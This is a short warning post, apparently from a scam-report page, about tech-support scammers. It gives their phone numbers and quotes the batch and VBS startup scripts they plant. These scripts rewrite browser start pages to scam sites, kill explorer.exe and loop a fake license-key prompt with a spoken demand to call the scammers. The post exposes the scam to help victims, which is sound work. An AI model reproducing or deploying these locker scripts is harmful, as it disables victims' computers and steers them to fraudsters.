These guys are very nasty scammers, horrible people. They disable explorer.exe by putting bat files and a VBS file in startup with the code included below.
Numbers: 315-215-0387 - 844-662-8777
Startup1:
cd “C:\Windows\System32”
@echo off
Go to Begin
@echo off
REG ADD “HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN” /V “START PAGE” /D “http://www.support82.com/google.html” /F
@echo off
REG ADD “HKCU\SOFTWARE\MICROSOFT\GOOGLE CHROME\MAIN” /V “START PAGE” /D “http://www.support82.com/google.html” /F
@echo off
REG ADD “HKCU\SOFTWARE\MICROSOFT\MOZILLA FIREFOX\MAIN” /V “START PAGE” /D “http://www.support82.com/google.html” /F
taskkill /im firefox.exe* /f
cd /D “C:\Users\ojha\AppData\Roaming\Mozilla\Firefox\Profiles”
cd *.default
set ffile=C:\Users\ojha\Start Menu\Programs\Startup
echo user_pref(“browser.startup.homepage”, “http://support16.com/google.html”);
set ffile=
cd C:\WINDOWS
javascript:(function(){ window.location.href=‘http://support16.com/google.html’;})();
Startup2:
taskkill /f /IM explorer.exe
Startup1vbs:
do
dim speechobjectset speechobject=createobject(“sapi.spvoice”)
pw=inputbox(“Enter license Key or Call at 315-215-0387”)
if pw=“word” then msgbox (“Correct password.”) else msgbox (“Incorrect, Enter License key”)
if pw=“word” then msgbox (“Welcome Sir”) else speechobject.speak “Your computer license is expire, please call at 315-215-0387.”
loop